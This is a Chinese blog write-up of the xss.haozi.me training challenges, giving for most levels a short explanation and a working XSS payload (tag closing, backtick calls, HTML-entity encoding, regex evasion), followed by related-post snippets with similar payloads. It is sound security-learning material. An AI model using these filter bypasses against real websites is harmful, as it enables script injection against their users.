xss.haozi.me解题记录

最新推荐文章于 2023-02-01 15:10:02 发布
最新推荐文章于 2023-02-01 15:10:02 发布
阅读量946 收藏 4
点赞数 1
分类专栏: 信息安全练习 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43623492/article/details/105230983
版权

0X00

payload:<script>alert(1)</script>
在这里插入图片描述

0x01

这一关可以发现我们输入的东西会出现在textarea标签内,所以我们尝试闭合textarea标签
payload:</textarea><script>alert(1)</script><!--
在这里插入图片描述

0x02

输入的内容会出现input标签的value属性内,我们可以先闭合value属性,再闭合input标签
payload:123"><script>alert(1)</script><!--
在这里插入图片描述

0x03

看server code可以看出括号会被替换成null,所以我们用锐音符代替括号
payload:<script>alert`1`</script>
在这里插入图片描述

0x04

括号与锐音符都被替换成了null,所以我们用HTML ASCII编码来代替(百度搜索HTML ASCII就能查到)括号svg标签有一个特性可以使其内的HTML实体执行,就是&#40;&#41;
payload:<svg><script>alert&#40;1&#41;</script><svg>
在这里插入图片描述

0x05

我们输入内容都会显示在注释中,所以我们尝试闭合注释
payload:--!><script>alert(1)</script>
在这里插入图片描述

0x06

看正则表达式,意思是on的前边如果有东西会被替换为下划线,我们回车一下就好了
payload:onclick =alert(1)
在这里插入图片描述

0x07

闭合的标签会被替换为空,用svg标签不闭合也会起作用
payload:<svg onload=alert(1)<!--
在这里插入图片描述

0x08

这一关我们输入的内容会出现在style标签内,所以我们必须闭合style标签,但正则表达式会把style标签替换为空,所以我们在style与>之间加一个空格,避免发生肢体接触
payload:</style ><script>alert(1)</script>
在这里插入图片描述

0x09

输入的内容出现在src属性内,所以要闭合src属性,并且正则表达式规定了格式
payload:https://www.segmentfault.com"></script><script>alert(1)<!--
在这里插入图片描述

0x0A

这题需要自己编写js文件,我就不会了

0x0B

输入的内容都会变成大写,所以用HTML实体转换一下就行了
payload:<img src=""" onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>
在这里插入图片描述

0x0C

和上一题类似可以先闭合h1标签,在用HTML实体代替
payload:</h1><input type="text" onclick=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;><!--
在这里插入图片描述

0x0D

直接输入alert(1)发现,然后回车跳出注释,再注释后边的内容
payload:alert(1) -->
在这里插入图片描述

0x0E

这题需要自己编写js文件,不会啊!!!???

0x0F

就俩字——闭合
payload:');alert('1
在这里插入图片描述

0x10

直接输入就行了
payload:alert(1)
在这里插入图片描述

0x11

闭合前,注释后就OK了
payload:");alert(1)//
在这里插入图片描述

0x12

依旧闭合前,注释后
payload:\");alert(1);//
在这里插入图片描述

zhangdy_plus
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5376
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
反序列化函数绕过
since_2020的博客
08-05 654
__wakeup()方法绕过 函数作用: 与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。 绕过方法: 当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。 <?php class Name{ private $username = 'admin'; private $password = 100; } $a = new Name(); $str = seria
xss.haozi.me通关教程
自强不息
02-01 1187
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
java在后台输出js弹出对话框
Fenice
02-26 5175
http://blog.163.com/yurong_1987@126/blog/static/4751786320092711596354/ 实现方法分为两种: 一、直接在后台打印js对话框,原理如下:     response.setContentType("text/html; charset=UTF-8"); //转码    PrintWriter out = response.ge
xss.haozi练习通关详解
金色%夕阳的博客
08-01 1929
xss.haozi练习通关概述 0x00 分析: 执行: 0x01 分析: 执行: 0x02 分析: 执行: 0x03 分析: 执行: 0x04 分析: 执行: 0x05 分析: 执行: 0x06 分析: 执行: 0x07
xss.js.zip
07-29
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,主要发生在Web应用中。它利用了网站的信任,将恶意脚本注入到网页中,当其他用户访问这些被篡改的页面时,恶意脚本会在用户的浏览器上执行,从而窃取用户...
xss.me自动攻击跨站搭建教材
05-01
搭建网站环境,我这里用的是APMServ 5.2.6。注意APMServ程序所在路径不能含有汉字和空格。
XSS.rar_XSS
09-22
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全问题,尤其是在Web前端开发中尤为突出。XSS攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户数据、操纵用户界面或者执行其他有害操作。以下...
XSS.zip_XSS_c xss
09-24
**XSS(跨站脚本攻击)基础知识** XSS,全称为Cross-Site Scripting,是一种常见的网络安全漏洞,主要发生在Web应用中。攻击者通过注入恶意脚本到网页上,当用户浏览这些网页时,恶意脚本会在用户的浏览器中执行,...
xss.js:简单的基于白名单的 html sanitizer
06-21
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者通过注入恶意脚本到网页上,进而执行非授权的操作,如窃取用户数据或控制用户的浏览器。为防止这种攻击,开发者通常会使用HTML Sanitizer,一个过滤或...
结合测试题分析XSS跨站脚本攻击几种常见手段(内附https://xss.haozi.me/试题答案)
wyhstars的博客
07-06 2151
欢迎使用Markdown编辑器写博客 本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I...
xss靶场练习之xss.haozi.me解析及答案
lyz_yyds107的博客
08-05 745
靶场绕过
xss.haozi 思路总结 0x00-0x12
yukinorong的博客
08-20 1505
xss刷题网站2 https://xss.haozi.me/ 一个非常可爱的网站。这是网站界面,题目序号是十六进制,一共19道题。 0x00 直接输入<script>alert(1)</script> 0x01 先闭合textarea框再实现</textarea><script>alert(1)</script> 0x02 在input...
xss.haozi.me通关记录
weixin_50597969的博客
04-13 1166
xss-haizi-me通关记录0x000x010x020x030x040x050x060x070x080x090x0A0x0B0x0C0x0D0x0E0x0F0x100x110x12 传送门 0x00 server code: function render (input) { return '<div>' + input + '</div>' } input code: <script>alert(1)</script> html: <div
xss.haozi挑战
CC_FL的博客
03-10 3765
0x03(模板字符串) <a href=javascript:alert `1`>1</a> 0x04(url) <a href="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&a..
haozi/xss-demo通关
ma963852的博客
04-13 256
目录 ​ 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f 0x10 0x11 0x12 0x00 <script> alert(1)</script> 0x01 </textarea><script>alert(1)</script> 0x02 "><s...
[渗透测试笔记] 10.xss训练专题
H4ppyD0g的博客
10-04 1621
找到一套题,看评价这套题还是挺好的,网址在博文题目里。 所有的题目要求都是弹窗1。 0x00 直接让它弹框就好了。 <script>alert('1')</script> ————————————————————————————————————— 0x01 闭合前面的<textarea>就好了。 payload </textarea><scr...
xss挑战赛-wp
Iambangbang的博客
08-20 956
prompt(1) to win problem 0   这道题没有别的特别之处,直接闭合标签然后构造就可以了,这里直接放payload ">prompt(1) 但是通过看大牛的wp这里也积累一些其他的思路, ">这个思路是利用了onload的免交互的特性 "onresize=prompt(1)>这个思路不常用,但是在IE10下,当页面第一次加载时,会调用resize事件,当把代
xss .htaccess apache
最新发布
07-27
针对防止XSS攻击,可以通过在Apache服务器上使用.htaccess文件来进行配置。.htaccess是用于在Apache服务器上设置网站配置的文件。 要防止XSS攻击,您可以添加以下代码到.htaccess文件中: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值